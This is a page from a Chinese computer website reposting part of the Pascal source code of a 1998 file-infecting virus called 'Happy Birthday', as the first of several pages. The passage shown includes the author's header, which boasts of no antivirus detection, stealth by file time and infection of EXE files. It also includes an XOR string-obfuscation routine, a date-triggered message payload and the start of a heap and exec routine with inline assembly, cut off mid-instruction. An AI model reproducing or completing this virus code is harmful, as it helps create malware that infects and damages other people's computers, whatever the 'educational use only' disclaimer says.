计算机充电网
 


  蠕虫病毒源码  
编辑:管理员  来源:逸仙时空  发表时间:2005-12-30  被查阅【】次<% Else %><% End If %>
Google

{ Happy Birthday (c) 1998 WoRm
      I don't take responsibility for any damage caused by this virus.
      It was made for EDUCATIONAL USE ONLY.
  AVs        : No detection
  Size       : 8928 bytes
  Payload    : yes - display text
  Stealth    : yes - file time
  Infects    : exe
  Encryption : no
          If you've got any question write to w0rm@freemail.c3.hu          
 }
{$I-}
uses windos,dos;
const virushossz=8928;
      dir:array[1..4] of string[10]=('g?Z`ido','g?Zmi}o`','g?Z`idox','g?Zmi}
o`cf');
var exebuffer,virusbuffer:array[1..virushossz] of byte;
    regia:word;
    regit:longint;
    fuck:word;
    disable:file;
    konyvt:string;
    eddig:byte;
    y,m,d,dow:word;
Function Crypt(S : String) : String;            {Encryption/Decryption of}
  Var                                           {A string.}
    i : Byte;
  begin
    For i := 1 to Length(S) Do
      S[i] := Char(ord(S[i]) xor (i+3));
    Crypt := S;
  end;
Procedure MEGLEPETES;                           {Display text}
begin
 GetDate(y,m,d,dow);
 if (m=6) and (d=22) then begin
     writeln('$Mgwxp*Izgtpk3CzDz9');
     writeln('$MD)XHY+z= <?:p=5''.!!:LsOs');
 end;
end;
Function DosShell(command:String):Integer;Var   {Maximize HEAP before exec}
 OldHeapEnd,
 NewHeapEnd: Word;
 Error:Integer;
Begin
 Error:=0;
 If MemAvail<$1000 then Error:=8;
 If Error=0 then Begin
  NewHeapEnd:=Seg(HeapPtr^)-PrefixSeg;
  OldHeapEnd:=Seg(HeapEnd^)-PrefixSeg;
   asm
    mov ah,4Ah
    mo

[1[2] [3] [4] [5] 

返回顶部】【 】【关闭窗口
  上篇文章:万花病毒源码   下篇文章:单片机系统的动态加密技术
计算机充电网 为您服务 关于本站 免责声明 法律法规 网址之家 便民查询 本站地图
 
Copyright © 72598.COM All Rights Reserved. 
E-mail:admin@72598.com QQ:360107618
粤ICP备06034384号